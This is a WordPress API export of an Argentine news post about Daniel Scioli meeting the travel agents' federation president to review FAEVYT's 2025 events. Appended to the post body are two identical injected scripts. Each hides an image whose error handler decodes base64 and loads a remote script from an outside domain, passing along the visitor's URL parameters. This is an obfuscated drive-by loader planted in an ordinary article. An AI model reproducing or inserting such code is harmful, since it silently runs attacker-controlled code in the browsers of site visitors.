{"id":4742,"date":"2025-01-17T14:48:29","date_gmt":"2025-01-17T17:48:29","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4742"},"modified":"2025-08-13T23:42:34","modified_gmt":"2025-08-14T02:42:34","slug":"scioli-se-reunio-con-el-presidente-de-federacion-de-agentes-de-viaje","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4742","title":{"rendered":"Scioli se reuni\u00f3 con el presidente de Federaci\u00f3n de Agentes de Viaje"},"content":{"rendered":"\n<h4 class=\"wp-block-heading\"><strong><em>Analizaron la agenda de trabajo conjunta para este a\u00f1o, con el objetivo de seguir impulsado el turismo en todo el pa\u00eds.<\/em><\/strong><\/h4>\n\n\n\n<p>El secretario de Turismo, Ambiente y Deportes,&nbsp;<strong>Daniel Scioli<\/strong>, recibi\u00f3 hoy al presidente de la Federaci\u00f3n Argentina de Asociaciones de Empresas de Viajes y Turismo,&nbsp;<strong>Andr\u00e9s Dey\u00e1<\/strong>, con qui\u00e9n repasaron las principales acciones de la&nbsp;<strong>agenda 2025 de la FAEVYT<\/strong>.<\/p>\n\n\n\n<p>En el marco de los cambios desregulatorios efectuados por la administraci\u00f3n del presidente Javier Milei,&nbsp;<strong>Dey\u00e1<\/strong>&nbsp;celebr\u00f3 que&nbsp;<em>\u201cdesde la implementaci\u00f3n del Registro Nacional de Agencias de Viajes, ya se inscribieron 1010 nuevas empresas\u201d<\/em>.<\/p>\n\n\n\n<p>Durante el encuentro, Dey\u00e1 le manifest\u00f3 al Secretario que los dos principales eventos del a\u00f1o ser\u00e1n el&nbsp;<strong>Congreso Anual de Agentes de Viajes<\/strong>&nbsp;-en su 50 aniversario, que se llevar\u00e1 a cabo los d\u00edas 29 y 30 de mayo en la ciudad entrerriana de Paran\u00e1- y la&nbsp;<strong>Feria de Turismo (FIT)<\/strong>&nbsp;-que se desarrollar\u00e1 en predio de La Rural de la Ciudad de Buenos Aires, del 27 al 30 de septiembre-.<\/p>\n\n\n\n<p>La agenda 2025 tambi\u00e9n incluye acciones comerciales, como el&nbsp;<strong>\u201cTravel Sale\u201d<\/strong>&nbsp;y&nbsp;<strong>\u201cArgentina en Bus\u201d<\/strong>, y promocionales, entre las que se destaca una campa\u00f1a para&nbsp;<strong>valorizar las agencias de viajes y la convenci\u00f3n de j\u00f3venes empresarios de turismo<\/strong>.<\/p>\n\n\n\n<p>Previamente, la&nbsp;<strong>agenda de Scioli<\/strong>&nbsp;incluy\u00f3 una reuni\u00f3n con el presidente de la C\u00e1mara Argentina de Turismo (CAT),&nbsp;<strong>Gustavo Hani<\/strong>, y con el presidente del Consejo Federal de Turismo (CFT),&nbsp;<strong>Valent\u00edn D\u00edaz Gilligan<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.argentina.gob.ar\/noticias\/scioli-se-reunio-con-el-presidente-de-federacion-de-agentes-de-viaje\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:329px;height:auto\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Analizaron la agenda de trabajo conjunta para este a\u00f1o, con el objetivo de seguir impulsado el turismo en todo el pa\u00eds. El secretario de Turismo, Ambiente y Deportes,&nbsp;Daniel Scioli, recibi\u00f3 hoy al presidente de la Federaci\u00f3n Argentina de Asociaciones de Empresas de Viajes y Turismo,&nbsp;Andr\u00e9s Dey\u00e1, con qui\u00e9n repasaron las principales acciones de la&nbsp;agenda 2025 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4743,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[20],"tags":[],"class_list":{"0":"post-4742","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-empresas"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4742"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4742"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4742\/revisions"}],"predecessor-version":[{"id":6597,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4742\/revisions\/6597"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4743"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4742"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4742"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4742"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}